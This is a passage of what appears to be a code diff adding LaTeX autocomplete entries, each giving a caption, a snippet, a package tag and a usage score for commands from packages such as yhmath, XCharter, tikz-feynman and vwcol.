+ caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'yhmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'yhmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'yhmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'yhmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'yhmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'yhmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'yhmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'yhmath-cmd', + score: 0.004163642482777231, + }, + { + 
caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'yhmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'yhmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'yhmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'yhmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'yhmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'yhmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'yhmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'yhmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'yhmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'yhmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'yhmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'yhmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'yhmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'yhmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'yhmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'yhmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'yhmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'yhmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'yhmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'yhmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'yhmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'yhmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'yhmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'yhmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'yhmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'yhmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: 
'\\bigg', + meta: 'yhmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'yhmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'yhmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'yhmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'yhmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'yhmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'yhmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'yhmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'yhmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'yhmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'yhmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'yhmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'yhmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'yhmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'yhmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'yhmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'yhmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'yhmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'yhmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'yhmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'yhmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'yhmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'yhmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'yhmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'yhmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'yhmath-cmd', + score: 
3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'yhmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'yhmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'yhmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'yhmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'yhmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'yhmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'yhmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'yhmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'yhmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'yhmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'yhmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'yhmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'yhmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'yhmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'yhmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'yhmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'yhmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'yhmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'yhmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'yhmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'yhmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'yhmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'yhmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'yhmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'yhmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'yhmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'yhmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'yhmath-cmd', + 
score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'yhmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'yhmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'yhmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'yhmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'yhmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'yhmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'yhmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'yhmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'yhmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'yhmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'yhmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'yhmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'yhmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'yhmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'yhmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'yhmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'yhmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'yhmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'yhmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'yhmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'yhmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'yhmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'yhmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'yhmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'yhmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'yhmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'yhmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'yhmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'yhmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'yhmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'yhmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'yhmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 
'yhmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'yhmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'yhmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'yhmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'yhmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'yhmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'yhmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'yhmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'yhmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'yhmath-cmd', + score: 0.0063276692758974925, + }, + ], + XCharter: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'XCharter-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'XCharter-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'XCharter-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'XCharter-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'XCharter-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'XCharter-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'XCharter-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'XCharter-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'XCharter-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'XCharter-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'XCharter-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'XCharter-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: 
'\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'XCharter-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'XCharter-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'XCharter-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'XCharter-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'XCharter-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'XCharter-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'XCharter-cmd', + score: 0.008565354665444157, + }, + ], + 'tikz-feynman': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-feynman-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-feynman-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-feynman-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-feynman-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-feynman-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-feynman-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + 
snippet: '\\expandafter', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-feynman-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-feynman-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-feynman-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-feynman-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-feynman-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-feynman-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-feynman-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-feynman-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-feynman-cmd', + score: 0.2864294797053033, + }, + ], + easylist: [ + { + caption: '\\ListProperties', + snippet: '\\ListProperties', + meta: 'easylist-cmd', + score: 5.7747123038330224e-5, + }, + ], + hologo: [ + { + caption: '\\hologo{}', + snippet: '\\hologo{$1}', + meta: 'hologo-cmd', + score: 0.00028086100750460613, + }, + ], + cases: [ + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'cases-cmd', + score: 0.002995924112493351, + }, + ], + xint: [ + { + caption: '\\xintSgnFork{}', + snippet: '\\xintSgnFork{$1}', + meta: 'xint-cmd', + score: 0.0005720629946669665, + }, + { + caption: '\\xintCmp{}{}', + snippet: '\\xintCmp{$1}{$2}', + meta: 'xint-cmd', + score: 0.0002860314973334833, + }, + { + caption: '\\xintOdd{}', + snippet: '\\xintOdd{$1}', + meta: 'xint-cmd', + score: 0.0002860314973334833, + }, + { + caption: '\\xintGeq', + snippet: '\\xintGeq', + meta: 'xint-cmd', + score: 0.0002860314973334833, + }, + ], + inputenx: [ + { + caption: '\\inputencoding{}', + snippet: '\\inputencoding{$1}', + meta: 'inputenx-cmd', + score: 0.0002447047447770061, + }, + ], + vwcol: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'vwcol-cmd', + score: 
0.04598628699063736, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'vwcol-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\justifying', + snippet: '\\justifying', + meta: 'vwcol-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\justifying{}', + snippet: '\\justifying{$1}', + meta: 'vwcol-cmd', + score: 0.010373702256548788, + }, + { + caption: '\\RaggedRight', + snippet: '\\RaggedRight', + meta: 'vwcol-cmd', + score: 0.001021021782267457, + }, + { + caption: '\\Centering', + snippet: '\\Centering', + meta: 'vwcol-cmd', + score: 0.00037395241488843035, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'vwcol-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'vwcol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'vwcol-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'vwcol-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'vwcol-cmd', + score: 0.028955796305270766, + }, + { + 